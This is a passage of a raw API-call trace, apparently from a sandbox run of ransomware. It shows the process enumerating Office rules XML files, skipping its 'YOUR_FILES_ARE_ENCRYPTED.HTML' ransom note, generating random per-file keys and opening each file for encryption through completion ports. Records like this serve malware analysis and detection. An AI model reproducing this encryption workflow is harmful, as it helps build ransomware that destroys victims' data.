lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\excel.exe_Rules.xml" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\excel.exe_Rules.xml") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\excel.exe_Rules.xml" [0111.262] CreateIoCompletionPort (FileHandle=0x310, ExistingCompletionPort=0x274, CompletionKey=0x30a0048, NumberOfConcurrentThreads=0x0) returned 0x274 [0111.262] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x30a0048, lpOverlapped=0x30a0048) returned 1 [0111.262] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc8cb2b47, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xc8cb2b47, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xc8cb2b47, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x11d02, dwReserved0=0x60f652, dwReserved1=0x60f5e0, cFileName="msaccess.exe_Rules.xml", cAlternateFileName="MSACCE~1.XML")) returned 1 [0111.262] StrStrIW (lpFirst="msaccess.exe_Rules.xml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.262] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\msaccess.exe_Rules.xml") returned 84 [0111.262] PathFindExtensionW (pszPath="msaccess.exe_Rules.xml") returned=".xml" [0111.262] lstrlenW (lpString=".xml") returned 4 [0111.262] PathFindExtensionW (pszPath="msaccess.exe_Rules.xml") returned=".xml" [0111.262] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0111.262] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\msaccess.exe_Rules.xml" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\office\\16.0\\msaccess.exe_rules.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x308 [0111.262] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x19e190 | out: lpFileSize=0x19e190*=72962) returned 1 [0111.263] GetProcessHeap () returned 0x600000 [0111.263] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x30c81a0 [0111.264] wsprintfW (in: param_1=0x19e0aa, param_2="%02X" | out: param_1="EB") returned 2 [0111.264] wsprintfW (in: param_1=0x19e0ae, param_2="%02X" | out: param_1="24") returned 2 [0111.264] wsprintfW (in: param_1=0x19e0b2, param_2="%02X" | out: param_1="C6") returned 2 [0111.264] wsprintfW (in: param_1=0x19e0b6, param_2="%02X" | out: param_1="83") returned 2 [0111.264] wsprintfW (in: param_1=0x19e0ba, param_2="%02X" | out: param_1="20") returned 2 [0111.264] wsprintfW (in: param_1=0x19e0be, param_2="%02X" | out: param_1="BD") returned 2 [0111.264] wsprintfW (in: param_1=0x19e0c2, param_2="%02X" | out: param_1="14") returned 2 [0111.264] wsprintfW (in: param_1=0x19e0c6, param_2="%02X" | out: param_1="7F") returned 2 [0111.264] wsprintfW (in: param_1=0x19e0ca, param_2="%02X" | out: param_1="7A") returned 2 [0111.264] wsprintfW (in: param_1=0x19e0ce, param_2="%02X" | out: param_1="BE") returned 2 [0111.264] wsprintfW (in: param_1=0x19e0d2, param_2="%02X" | out: param_1="F6") returned 2 [0111.264] wsprintfW (in: param_1=0x19e0d6, param_2="%02X" | out: param_1="4F") returned 2 [0111.264] wsprintfW (in: param_1=0x19e0da, param_2="%02X" | out: param_1="57") returned 2 [0111.264] wsprintfW (in: param_1=0x19e0de, param_2="%02X" | out: param_1="D9") returned 2 [0111.264] wsprintfW (in: param_1=0x19e0e2, param_2="%02X" | out: param_1="D3") returned 2 [0111.264] wsprintfW (in: param_1=0x19e0e6, param_2="%02X" | out: param_1="0C") returned 2 [0111.264] wsprintfW (in: param_1=0x19e0ea, param_2="%02X" | out: param_1="02") returned 2 [0111.264] wsprintfW (in: param_1=0x19e0ee, param_2="%02X" | out: param_1="6C") returned 2 [0111.264] wsprintfW (in: param_1=0x19e0f2, param_2="%02X" | out: param_1="AD") returned 2 [0111.264] wsprintfW (in: param_1=0x19e0f6, param_2="%02X" | out: param_1="75") returned 2 [0111.264] wsprintfW (in: param_1=0x19e0fa, param_2="%02X" | out: param_1="12") returned 2 [0111.264] wsprintfW (in: param_1=0x19e0fe, param_2="%02X" | out: param_1="03") returned 2 [0111.265] wsprintfW (in: param_1=0x19e102, param_2="%02X" | out: param_1="7C") returned 2 [0111.265] wsprintfW (in: param_1=0x19e106, param_2="%02X" | out: param_1="42") returned 2 [0111.265] wsprintfW (in: param_1=0x19e10a, param_2="%02X" | out: param_1="2B") returned 2 [0111.265] wsprintfW (in: param_1=0x19e10e, param_2="%02X" | out: param_1="77") returned 2 [0111.265] wsprintfW (in: param_1=0x19e112, param_2="%02X" | out: param_1="7F") returned 2 [0111.265] wsprintfW (in: param_1=0x19e116, param_2="%02X" | out: param_1="82") returned 2 [0111.265] wsprintfW (in: param_1=0x19e11a, param_2="%02X" | out: param_1="16") returned 2 [0111.265] wsprintfW (in: param_1=0x19e11e, param_2="%02X" | out: param_1="13") returned 2 [0111.265] wsprintfW (in: param_1=0x19e122, param_2="%02X" | out: param_1="1F") returned 2 [0111.265] wsprintfW (in: param_1=0x19e126, param_2="%02X" | out: param_1="5A") returned 2 [0111.265] lstrcpyW (in: lpString1=0x30d8254, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\msaccess.exe_Rules.xml" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\msaccess.exe_Rules.xml") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\msaccess.exe_Rules.xml" [0111.265] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x274, CompletionKey=0x30c81a0, NumberOfConcurrentThreads=0x0) returned 0x274 [0111.265] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x30c81a0, lpOverlapped=0x30c81a0) returned 1 [0111.265] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x20bb7bfa, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x20bb7bfa, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x20bb8ff9, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x4050, dwReserved0=0x60f652, dwReserved1=0x60f5e0, cFileName="officec2rclient.exe_Rules.xml", cAlternateFileName="OFFICE~2.XML")) returned 1 [0111.265] StrStrIW (lpFirst="officec2rclient.exe_Rules.xml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.265] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\officec2rclient.exe_Rules.xml") returned 91 [0111.265] PathFindExtensionW (pszPath="officec2rclient.exe_Rules.xml") returned=".xml" [0111.265] lstrlenW (lpString=".xml") returned 4 [0111.265] PathFindExtensionW (pszPath="officec2rclient.exe_Rules.xml") returned=".xml" [0111.265] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0111.266] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\officec2rclient.exe_Rules.xml" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\office\\16.0\\officec2rclient.exe_rules.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x32c [0111.266] GetFileSizeEx (in: hFile=0x32c, lpFileSize=0x19e190 | out: lpFileSize=0x19e190*=16464) returned 1 [0111.266] GetProcessHeap () returned 0x600000 [0111.266] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x660338 [0111.269] wsprintfW (in: param_1=0x19e0aa, param_2="%02X" | out: param_1="34") returned 2 [0111.269] wsprintfW (in: param_1=0x19e0ae, param_2="%02X" | out: param_1="FC") returned 2 [0111.269] wsprintfW (in: param_1=0x19e0b2, param_2="%02X" | out: param_1="B4") returned 2 [0111.269] wsprintfW (in: param_1=0x19e0b6, param_2="%02X" | out: param_1="89") returned 2 [0111.269] wsprintfW (in: param_1=0x19e0ba, param_2="%02X" | out: param_1="56") returned 2 [0111.269] wsprintfW (in: param_1=0x19e0be, param_2="%02X" | out: param_1="3D") returned 2 [0111.269] wsprintfW (in: param_1=0x19e0c2, param_2="%02X" | out: param_1="3D") returned 2 [0111.269] wsprintfW (in: param_1=0x19e0c6, param_2="%02X" | out: param_1="BF") returned 2 [0111.269] wsprintfW (in: param_1=0x19e0ca, param_2="%02X" | out: param_1="4D") returned 2 [0111.269] wsprintfW (in: param_1=0x19e0ce, param_2="%02X" | out: param_1="8B") returned 2 [0111.269] wsprintfW (in: param_1=0x19e0d2, param_2="%02X" | out: param_1="74") returned 2 [0111.269] wsprintfW (in: param_1=0x19e0d6, param_2="%02X" | out: param_1="58") returned 2 [0111.269] wsprintfW (in: param_1=0x19e0da, param_2="%02X" | out: param_1="5F") returned 2 [0111.269] wsprintfW (in: param_1=0x19e0de, param_2="%02X" | out: param_1="F0") returned 2 [0111.269] wsprintfW (in: param_1=0x19e0e2, param_2="%02X" | out: param_1="FF") returned 2 [0111.269] wsprintfW (in: param_1=0x19e0e6, param_2="%02X" | out: param_1="5D") returned 2 [0111.269] wsprintfW (in: param_1=0x19e0ea, param_2="%02X" | out: param_1="8D") returned 2 [0111.269] wsprintfW (in: param_1=0x19e0ee, param_2="%02X" | out: param_1="D9") returned 2 [0111.269] wsprintfW (in: param_1=0x19e0f2, param_2="%02X" | out: param_1="DE") returned 2 [0111.269] wsprintfW (in: param_1=0x19e0f6, param_2="%02X" | out: param_1="A0") returned 2 [0111.269] wsprintfW (in: param_1=0x19e0fa, param_2="%02X" | out: param_1="74") returned 2 [0111.269] wsprintfW (in: param_1=0x19e0fe, param_2="%02X" | out: param_1="CE") returned 2 [0111.269] wsprintfW (in: param_1=0x19e102, param_2="%02X" | out: param_1="8C") returned 2 [0111.269] wsprintfW (in: param_1=0x19e106, param_2="%02X" | out: param_1="F7") returned 2 [0111.269] wsprintfW (in: param_1=0x19e10a, param_2="%02X" | out: param_1="B0") returned 2 [0111.269] wsprintfW (in: param_1=0x19e10e, param_2="%02X" | out: param_1="E0") returned 2 [0111.269] wsprintfW (in: param_1=0x19e112, param_2="%02X" | out: param_1="10") returned 2 [0111.269] wsprintfW (in: param_1=0x19e116, param_2="%02X" | out: param_1="22") returned 2 [0111.269] wsprintfW (in: param_1=0x19e11a, param_2="%02X" | out: param_1="C2") returned 2 [0111.269] wsprintfW (in: param_1=0x19e11e, param_2="%02X" | out: param_1="D4") returned 2 [0111.269] wsprintfW (in: param_1=0x19e122, param_2="%02X" | out: param_1="95") returned 2 [0111.269] wsprintfW (in: param_1=0x19e126, param_2="%02X" | out: param_1="54") returned 2 [0111.270] lstrcpyW (in: lpString1=0x6703ec, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\officec2rclient.exe_Rules.xml" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\officec2rclient.exe_Rules.xml") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\officec2rclient.exe_Rules.xml" [0111.270] CreateIoCompletionPort (FileHandle=0x32c, ExistingCompletionPort=0x274, CompletionKey=0x660338, NumberOfConcurrentThreads=0x0) returned 0x274 [0111.270] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x660338, lpOverlapped=0x660338) returned 1 [0111.270] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1cfcf021, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x1cfcf021, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x1cfcf021, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x4050, dwReserved0=0x60f652, dwReserved1=0x60f5e0, cFileName="officeclicktorun.exe_Rules.xml", cAlternateFileName="OFFICE~1.XML")) returned 1 [0111.270] StrStrIW (lpFirst="officeclicktorun.exe_Rules.xml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.270] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\officeclicktorun.exe_Rules.xml") returned 92 [0111.270] PathFindExtensionW (pszPath="officeclicktorun.exe_Rules.xml") returned=".xml" [0111.270] lstrlenW (lpString=".xml") returned 4 [0111.270] PathFindExtensionW (pszPath="officeclicktorun.exe_Rules.xml") returned=".xml" [0111.270] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0111.270] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\officeclicktorun.exe_Rules.xml" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\office\\16.0\\officeclicktorun.exe_rules.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x324 [0111.271] GetFileSizeEx (in: hFile=0x324, lpFileSize=0x19e190 | out: lpFileSize=0x19e190*=16464) returned 1 [0111.271] GetProcessHeap () returned 0x600000 [0111.271] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x688490 [0111.272] wsprintfW (in: param_1=0x19e0aa, param_2="%02X" | out: param_1="01") returned 2 [0111.272] wsprintfW (in: param_1=0x19e0ae, param_2="%02X" | out: param_1="A4") returned 2 [0111.272] wsprintfW (in: param_1=0x19e0b2, param_2="%02X" | out: param_1="FF") returned 2 [0111.273] wsprintfW (in: param_1=0x19e0b6, param_2="%02X" | out: param_1="28") returned 2 [0111.273] wsprintfW (in: param_1=0x19e0ba, param_2="%02X" | out: param_1="5B") returned 2 [0111.273] wsprintfW (in: param_1=0x19e0be, param_2="%02X" | out: param_1="A8") returned 2 [0111.273] wsprintfW (in: param_1=0x19e0c2, param_2="%02X" | out: param_1="A6") returned 2 [0111.273] wsprintfW (in: param_1=0x19e0c6, param_2="%02X" | out: param_1="DD") returned 2 [0111.273] wsprintfW (in: param_1=0x19e0ca, param_2="%02X" | out: param_1="A6") returned 2 [0111.273] wsprintfW (in: param_1=0x19e0ce, param_2="%02X" | out: param_1="12") returned 2 [0111.273] wsprintfW (in: param_1=0x19e0d2, param_2="%02X" | out: param_1="9D") returned 2 [0111.273] wsprintfW (in: param_1=0x19e0d6, param_2="%02X" | out: param_1="DD") returned 2 [0111.273] wsprintfW (in: param_1=0x19e0da, param_2="%02X" | out: param_1="EB") returned 2 [0111.273] wsprintfW (in: param_1=0x19e0de, param_2="%02X" | out: param_1="96") returned 2 [0111.273] wsprintfW (in: param_1=0x19e0e2, param_2="%02X" | out: param_1="53") returned 2 [0111.273] wsprintfW (in: param_1=0x19e0e6, param_2="%02X" | out: param_1="9D") returned 2 [0111.273] wsprintfW (in: param_1=0x19e0ea, param_2="%02X" | out: param_1="76") returned 2 [0111.273] wsprintfW (in: param_1=0x19e0ee, param_2="%02X" | out: param_1="51") returned 2 [0111.273] wsprintfW (in: param_1=0x19e0f2, param_2="%02X" | out: param_1="8E") returned 2 [0111.273] wsprintfW (in: param_1=0x19e0f6, param_2="%02X" | out: param_1="76") returned 2 [0111.273] wsprintfW (in: param_1=0x19e0fa, param_2="%02X" | out: param_1="C3") returned 2 [0111.273] wsprintfW (in: param_1=0x19e0fe, param_2="%02X" | out: param_1="96") returned 2 [0111.273] wsprintfW (in: param_1=0x19e102, param_2="%02X" | out: param_1="E2") returned 2 [0111.273] wsprintfW (in: param_1=0x19e106, param_2="%02X" | out: param_1="48") returned 2 [0111.273] wsprintfW (in: param_1=0x19e10a, param_2="%02X" | out: param_1="A6") returned 2 [0111.273] wsprintfW (in: param_1=0x19e10e, param_2="%02X" | out: param_1="78") returned 2 [0111.273] wsprintfW (in: param_1=0x19e112, param_2="%02X" | out: param_1="A6") returned 2 [0111.273] wsprintfW (in: param_1=0x19e116, param_2="%02X" | out: param_1="81") returned 2 [0111.273] wsprintfW (in: param_1=0x19e11a, param_2="%02X" | out: param_1="46") returned 2 [0111.273] wsprintfW (in: param_1=0x19e11e, param_2="%02X" | out: param_1="E8") returned 2 [0111.273] wsprintfW (in: param_1=0x19e122, param_2="%02X" | out: param_1="9D") returned 2 [0111.273] wsprintfW (in: param_1=0x19e126, param_2="%02X" | out: param_1="2F") returned 2 [0111.274] lstrcpyW (in: lpString1=0x698544, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\officeclicktorun.exe_Rules.xml" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\officeclicktorun.exe_Rules.xml") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\officeclicktorun.exe_Rules.xml" [0111.274] CreateIoCompletionPort (FileHandle=0x324, ExistingCompletionPort=0x274, CompletionKey=0x688490, NumberOfConcurrentThreads=0x0) returned 0x274 [0111.274] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x688490, lpOverlapped=0x688490) returned 1 [0111.274] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3b96fdbf, ftCreationTime.dwHighDateTime=0x1d70699, ftLastAccessTime.dwLowDateTime=0x3b96fdbf, ftLastAccessTime.dwHighDateTime=0x1d70699, ftLastWriteTime.dwLowDateTime=0x3b96fdbf, ftLastWriteTime.dwHighDateTime=0x1d70699, nFileSizeHigh=0x0, nFileSizeLow=0x14a91, dwReserved0=0x60f652, dwReserved1=0x60f5e0, cFileName="outlook.exe_Rules.xml", cAlternateFileName="OUTLOO~1.XML")) returned 1 [0111.274] StrStrIW (lpFirst="outlook.exe_Rules.xml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.274] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\outlook.exe_Rules.xml") returned 83 [0111.274] PathFindExtensionW (pszPath="outlook.exe_Rules.xml") returned=".xml" [0111.274] lstrlenW (lpString=".xml") returned 4 [0111.274] PathFindExtensionW (pszPath="outlook.exe_Rules.xml") returned=".xml" [0111.274] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0111.274] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\outlook.exe_Rules.xml" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\office\\16.0\\outlook.exe_rules.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x328 [0111.274] GetFileSizeEx (in: hFile=0x328, lpFileSize=0x19e190 | out: lpFileSize=0x19e190*=84625) returned 1 [0111.274] GetProcessHeap () returned 0x600000 [0111.274] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x30f2fc0 [0111.276] wsprintfW (in: param_1=0x19e0aa, param_2="%02X" | out: param_1="80") returned 2 [0111.276] wsprintfW (in: param_1=0x19e0ae, param_2="%02X" | out: param_1="1F") returned 2 [0111.277] wsprintfW (in: param_1=0x19e0b2, param_2="%02X" | out: param_1="DE") returned 2 [0111.277] wsprintfW (in: param_1=0x19e0b6, param_2="%02X" | out: param_1="C0") returned 2 [0111.277] wsprintfW (in: param_1=0x19e0ba, param_2="%02X" | out: param_1="B6") returned 2 [0111.277] wsprintfW (in: param_1=0x19e0be, param_2="%02X" | out: param_1="16") returned 2 [0111.277] wsprintfW (in: param_1=0x19e0c2, param_2="%02X" | out: param_1="44") returned 2 [0111.277] wsprintfW (in: param_1=0x19e0c6, param_2="%02X" | out: param_1="27") returned 2 [0111.277] wsprintfW (in: param_1=0x19e0ca, param_2="%02X" | out: param_1="38") returned 2 [0111.277] wsprintfW (in: param_1=0x19e0ce, param_2="%02X" | out: param_1="09") returned 2 [0111.277] wsprintfW (in: param_1=0x19e0d2, param_2="%02X" | out: param_1="F6") returned 2 [0111.277] wsprintfW (in: param_1=0x19e0d6, param_2="%02X" | out: param_1="88") returned 2 [0111.277] wsprintfW (in: param_1=0x19e0da, param_2="%02X" | out: param_1="7B") returned 2 [0111.277] wsprintfW (in: param_1=0x19e0de, param_2="%02X" | out: param_1="AF") returned 2 [0111.277] wsprintfW (in: param_1=0x19e0e2, param_2="%02X" | out: param_1="72") returned 2 [0111.277] wsprintfW (in: param_1=0x19e0e6, param_2="%02X" | out: param_1="A0") returned 2 [0111.277] wsprintfW (in: param_1=0x19e0ea, param_2="%02X" | out: param_1="35") returned 2 [0111.277] wsprintfW (in: param_1=0x19e0ee, param_2="%02X" | out: param_1="75") returned 2 [0111.277] wsprintfW (in: param_1=0x19e0f2, param_2="%02X" | out: param_1="25") returned 2 [0111.277] wsprintfW (in: param_1=0x19e0f6, param_2="%02X" | out: param_1="71") returned 2 [0111.277] wsprintfW (in: param_1=0x19e0fa, param_2="%02X" | out: param_1="6D") returned 2 [0111.277] wsprintfW (in: param_1=0x19e0fe, param_2="%02X" | out: param_1="4B") returned 2 [0111.277] wsprintfW (in: param_1=0x19e102, param_2="%02X" | out: param_1="B5") returned 2 [0111.277] wsprintfW (in: param_1=0x19e106, param_2="%02X" | out: param_1="D8") returned 2 [0111.277] wsprintfW (in: param_1=0x19e10a, param_2="%02X" | out: param_1="8D") returned 2 [0111.277] wsprintfW (in: param_1=0x19e10e, param_2="%02X" | out: param_1="7D") returned 2 [0111.277] wsprintfW (in: param_1=0x19e112, param_2="%02X" | out: param_1="E2") returned 2 [0111.277] wsprintfW (in: param_1=0x19e116, param_2="%02X" | out: param_1="68") returned 2 [0111.277] wsprintfW (in: param_1=0x19e11a, param_2="%02X" | out: param_1="D2") returned 2 [0111.277] wsprintfW (in: param_1=0x19e11e, param_2="%02X" | out: param_1="4B") returned 2 [0111.277] wsprintfW (in: param_1=0x19e122, param_2="%02X" | out: param_1="C4") returned 2 [0111.277] wsprintfW (in: param_1=0x19e126, param_2="%02X" | out: param_1="1A") returned 2 [0111.278] lstrcpyW (in: lpString1=0x3103074, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\outlook.exe_Rules.xml" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\outlook.exe_Rules.xml") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\outlook.exe_Rules.xml" [0111.278] CreateIoCompletionPort (FileHandle=0x328, ExistingCompletionPort=0x274, CompletionKey=0x30f2fc0, NumberOfConcurrentThreads=0x0) returned 0x274 [0111.278] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x30f2fc0, lpOverlapped=0x30f2fc0) returned 1 [0111.278] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb50ff70b, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xb50ff70b, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xb50ff70b, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x12c3e, dwReserved0=0x60f652, dwReserved1=0x60f5e0, cFileName="powerpnt.exe_Rules.xml", cAlternateFileName="POWERP~1.XML")) returned 1 [0111.278] StrStrIW (lpFirst="powerpnt.exe_Rules.xml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.278] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\powerpnt.exe_Rules.xml") returned 84 [0111.278] PathFindExtensionW (pszPath="powerpnt.exe_Rules.xml") returned=".xml" [0111.278] lstrlenW (lpString=".xml") returned 4 [0111.278] PathFindExtensionW (pszPath="powerpnt.exe_Rules.xml") returned=".xml" [0111.278] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0111.278] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\powerpnt.exe_Rules.xml" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\office\\16.0\\powerpnt.exe_rules.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x318 [0111.278] GetFileSizeEx (in: hFile=0x318, lpFileSize=0x19e190 | out: lpFileSize=0x19e190*=76862) returned 1 [0111.278] GetProcessHeap () returned 0x600000 [0111.278] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x32a0048 [0111.281] wsprintfW (in: param_1=0x19e0aa, param_2="%02X" | out: param_1="63") returned 2 [0111.281] wsprintfW (in: param_1=0x19e0ae, param_2="%02X" | out: param_1="54") returned 2 [0111.281] wsprintfW (in: param_1=0x19e0b2, param_2="%02X" | out: param_1="C0") returned 2 [0111.281] wsprintfW (in: param_1=0x19e0b6, param_2="%02X" | out: param_1="80") returned 2 [0111.281] wsprintfW (in: param_1=0x19e0ba, param_2="%02X" | out: param_1="4F") returned 2 [0111.281] wsprintfW (in: param_1=0x19e0be, param_2="%02X" | out: param_1="15") returned 2 [0111.281] wsprintfW (in: param_1=0x19e0c2, param_2="%02X" | out: param_1="0A") returned 2 [0111.281] wsprintfW (in: param_1=0x19e0c6, param_2="%02X" | out: param_1="AC") returned 2 [0111.281] wsprintfW (in: param_1=0x19e0ca, param_2="%02X" | out: param_1="CF") returned 2 [0111.281] wsprintfW (in: param_1=0x19e0ce, param_2="%02X" | out: param_1="92") returned 2 [0111.281] wsprintfW (in: param_1=0x19e0d2, param_2="%02X" | out: param_1="04") returned 2 [0111.281] wsprintfW (in: param_1=0x19e0d6, param_2="%02X" | out: param_1="16") returned 2 [0111.281] wsprintfW (in: param_1=0x19e0da, param_2="%02X" | out: param_1="ED") returned 2 [0111.281] wsprintfW (in: param_1=0x19e0de, param_2="%02X" | out: param_1="86") returned 2 [0111.281] wsprintfW (in: param_1=0x19e0e2, param_2="%02X" | out: param_1="10") returned 2 [0111.281] wsprintfW (in: param_1=0x19e0e6, param_2="%02X" | out: param_1="FA") returned 2 [0111.281] wsprintfW (in: param_1=0x19e0ea, param_2="%02X" | out: param_1="10") returned 2 [0111.281] wsprintfW (in: param_1=0x19e0ee, param_2="%02X" | out: param_1="15") returned 2 [0111.282] wsprintfW (in: param_1=0x19e0f2, param_2="%02X" | out: param_1="A8") returned 2 [0111.282] wsprintfW (in: param_1=0x19e0f6, param_2="%02X" | out: param_1="45") returned 2 [0111.282] wsprintfW (in: param_1=0x19e0fa, param_2="%02X" | out: param_1="6A") returned 2 [0111.282] wsprintfW 